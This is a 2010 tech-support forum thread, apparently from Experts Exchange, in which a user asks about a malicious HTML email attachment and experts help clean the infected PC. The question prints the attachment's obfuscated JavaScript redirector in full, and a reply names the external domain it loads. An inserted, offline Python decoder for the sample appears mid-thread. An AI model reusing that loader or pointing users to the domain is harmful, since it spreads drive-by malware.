Solved

Does Anyone Know This Malicious Attachment

Posted on 2010-09-20
Last Modified: 2013-11-22
Hi,

I just received one of those spam emails that had an attachment inside it from what looked like a person I recognised. The attachment had a not too unfamiliar name, report.html, and I opened it with Firefox.

The attachment was a few lines of JavaScript which I have included below for reference and appear to be part of the jsunpack tool.

After clicking on the attachment, a line of text appeared in the browser along the lines of "please wait a few seconds". At this point I right-clicked the attachment and ran an AVG scan on it, which reported malware.

Additionally, a window popped up which appeared to be Windows Firewall asking me if I wanted to block Windows Explorer. I clicked "Block" and then shut down the computer.

I re-booted and all seems to be OK, but the Windows Firewall message is displayed asking if I want to Keep Blocking Windows Explorer.

Does anyone understand the code below and know if this is a virus / trojan, so that I can find out what it does and try to remove it? I have run a full AVG scan but it doesn't report that a virus is present.

Many thanks

<script language="JavaScript" type="text/javascript">function bn6s(m0ga){var
lpr5,co7a="",idmu,s1d5="goac>tep \":/;iv=b-nq.rhfuxm0sl<",os9w,yvsg=s1d5.length;eval(unescape("%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D"));for(os9w=0;os9w<m0ga.length;os9w++){idmu=m0ga.charAt(os9w);lpr5=s1d5.indexOf(idmu);if(lpr5>-1){lpr5-=(os9w+1)%yvsg;if(lpr5<0){lpr5+=yvsg;}bv77(s1d5.charAt(lpr5));}else{bv77(idmu);}}eval(unescape("%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;"));}bn6s("gs\"\"pvliv-snops<o0\"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Question by:ls21gce
20 Comments
 
LVL 7

Expert Comment

by:John Jennings
ID: 33718140
Hard to say for sure exactly what it does.

It appears to use some encryption.
0
 
LVL 7

Expert Comment

by:John Jennings
ID: 33718145
On a side-note,

Go to Google and download MalwareBytes Anti-Malware, their free version. Install it, and run a scan with it. I bet it finds something.
0
 
LVL 8

Expert Comment

by:hello_everybody
ID: 33718767
It will direct you to: http://nobletree.org/x.html (that specific page doesn't exist, but the website does).

I hope that helps!
0
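As an added, defender-side illustration (not code from the thread or from any poster): the script's bn6s() function is a positional substitution over a 31-character alphabet, so the markup it would hand to document.write() can be recovered in Python without ever running the JavaScript. The alphabet and the argument are copied from the script quoted in the question; the function names and the meta-refresh parser are mine.

```python
import re

# Copied from the script quoted in the question: the substitution alphabet
# (the variable the script calls s1d5) and the string passed to bn6s().
ALPHABET = 'goac>tep ":/;iv=b-nq.rhfuxm0sl<'
PAYLOAD = 'gs""pvliv-snops<o0"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r='


def decode(payload: str, alphabet: str = ALPHABET) -> str:
    """Re-implement the bn6s() loop without eval(): every character that occurs in
    the alphabet is shifted back by (position + 1) mod len(alphabet), wrapping
    around; characters outside the alphabet are copied through unchanged."""
    n = len(alphabet)
    out = []
    for i, ch in enumerate(payload):
        idx = alphabet.find(ch)
        if idx == -1:
            out.append(ch)              # not in the alphabet: passed through as-is
            continue
        idx = (idx - (i + 1) % n) % n   # Python's % already wraps negative values
        out.append(alphabet[idx])
    return "".join(out)


def redirect_target(markup: str):
    """Extract the url= part of a <meta http-equiv="refresh"> tag, or None."""
    m = re.search(r'content="\d+;\s*url=([^"]+)"', markup, re.IGNORECASE)
    return m.group(1) if m else None


if __name__ == "__main__":
    html = decode(PAYLOAD)
    print("document.write() would emit:", html)
    print("redirect target:", redirect_target(html))
```

Run offline it shows that the only thing the script writes is a zero-second meta refresh, which is why the vendors in the thread label it a redirector; anything further would have to come from the destination page itself.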
 
LVL 7

Expert Comment

by:John Jennings
ID: 33718959
0
 
LVL 30

Expert Comment

by:Thomas Zucker-Scharff
ID: 33718968
0
 

Author Comment

by:ls21gce
ID: 33719438
What is this nobletree.org website about ? I clicked on this but it is some kind of investments website ?
Is there really a guy on here masquerading as a "Master" just to send people to his investments site ?
0
 
LVL 30

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719705
As I said, don't go there. Whatever the site is, it isn't worth endangering your computer/identity over. Whenever you have a questionable website, if you don't use a link checker like linkextender, AVG link checker, or Web of Trust, use F-Secure's URL checker:

https://browsingprotectionbeta.f-secure.com/swp/home
0
 

Author Comment

by:ls21gce
ID: 33719944
Can I just recap on your view of this embedded javascript code...

By opening this code in a browser, it will not have been able to deposit any sort of "payload" onto my computer in the form of virus etc. Instead it is a harmless re-direction to some kind of investments website in an attempt to gather business ?

Thanks
0
 
LVL 30

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719973
It is a redirection to that site, but according to the f-secure site it is anything BUT harmless - beware of a payload from that site.
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33720590
I have saved the above code into a file and uploaded it to Virustotal.com, and it reported that at least 9 antivirus vendors found this code suspicious. Here are the ones which detected the virus:

Vendor        Engine          Updated       Result
Authentium    5.2.0.5         2010.09.20    HTML/Redir.C
ClamAV        0.96.2.0-git    2010.09.20    JS.Generic
F-Prot        4.6.2.117       2010.09.20    HTML/Redir.C
Kaspersky     7.0.0.125       2010.09.20    Trojan-Downloader.JS.Small.ov
Microsoft     1.6201          2010.09.20    VirTool:JS/Obfuscator.W
NOD32         5465            2010.09.20    JS/Redirector.NAU
PCTools       7.0.3.5         2010.09.20    Trojan.Webkit
Sophos        4.57.0          2010.09.20    JS/WndRed-B
VirusBuster   12.65.16.0      2010.09.20    JS.Redirector.Gen.13

There is no detailed information available on the net.

http://www.securelist.com/en/descriptions/15411634/Trojan-Downloader.JS.Small.ov

Since you mentioned that AVG detected it, I think you are safe and no harmful files were downloaded to your computer.

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33720819
Hi Sudeep,

Thanks for your comments but I am not so confident that there was no harm done to my system.

What happened was that I received the message PLEASE WAITING 4 SECOND...
Then another window popped up which looked like it was from Windows Firewall asking me if I wanted to block Windows Explorer. I immediately clicked on the "Block" button thinking I was doing the right thing but I now suspect this was actually a fake screen designed to look like Windows Firewall and when I clicked I executed a payload. This was when my screen went blank and appeared to be scanning through files in DOS mode. I immediately executed a shutdown but this was likely to be too late.

I have re-booted my system and the same pop-up message appeared asking if I wanted to keep blocking Windows Explorer to which I clicked on "Keep Blocking" and all seems to be working OK but how can I tell if my computer or our network is now infected ?

I have executed an AVG virus scan which shows nothing.

0
 
LVL 30

Accepted Solution

by:
Sudeep Sharma earned 2000 total points
ID: 33720840
Just to make sure the system is clean, do the following:

Try HitmanPro to make sure anything which might be left behind is cleaned:
32bit
http://dl.surfright.nl/HitmanPro35.exe
http://download.cnet.com/Hitman-Pro-3/3000-2239_4-10895604.html

64bit
http://dl.surfright.nl/HitmanPro35_x64.exe

If the issue is not resolved by these tools, try TDSSKiller:
http://support.kaspersky.com/downloads/utils/tdsskiller.zip
http://support.kaspersky.com/downloads/utils/tdsskiller.exe

Tutorial on TDSSKiller:
http://support.kaspersky.com/viruses/solutions?qid=208280684

If this does not resolve your issue then try Combofix:

Download Combofix
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Tutorial on how to use combofix:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Post logs here for further analysis.

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33721465
Hi Sudeep,

I have run all three of the tools you suggested. There were further .exe files identified and removed that were not seen by AVG. They were a.exe, created today in My Documents, and what looked like the same program (by size) in Application Data/Tivy/apola.exe. So it looks like this had deposited something onto my system, but what it is and whether all instances are removed is another question. I am just not sure if I can trust my system any more as this appears to be a new threat. I can't find any reference to Tivy/apola on the net anywhere... Also it detected Variant.Kazy.711 which I can also not find.

I have also posted the logs as you suggested.

Many thanks
Combo-Fix-log.txt
Hitman-log.xml
TDSSKiller.2.4.2.1-20.09.2010-23.txt
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33728202
Could you please run Combofix one more time and paste the logs here?

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33729314
Hi Sudeep,

I have now re-run the COMBOFIX Tool and the log of Run2 is attached

Thanks
Combo-Fix-log-Run2.txt
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33729848
The Combofix logs above seem pretty clean to me. Are you still noticing any suspicious EXE anywhere in the system?

Even after reboot?

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33730227
Hi Sudeep,

I am not noticing anything out of the ordinary, apart from the odd unexpected MS Outlook abend, but I have an unnerving feeling, almost paranoia, that if I log into my online banking account or enter my credit card details there might be an undetected trojan gathering the data to be sent to a rogue website somewhere.

I would certainly feel a lot happier if one of the big anti-virus companies tested this virus to find out what it is doing.

Do you think it will now be possible to trust this PC is clean and safe ?

Thanks
0
 
LVL 2

Expert Comment

by:waldosmx
ID: 33737486
Hi ls21gce, I recommend you start a topic here ;) geekstogo.com/forum/forum/37-virus-spyware-malware-removal/
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33737523
Since most things have been removed, I think you are good to go. However, we could not say for sure if there is anything else which is left behind. But I must say you are in a position now where you could easily take a backup of your system and do a clean install.

Sudeep
0
 

Author Closing Comment

by:ls21gce
ID: 33742709
Top Notch Advice !
0
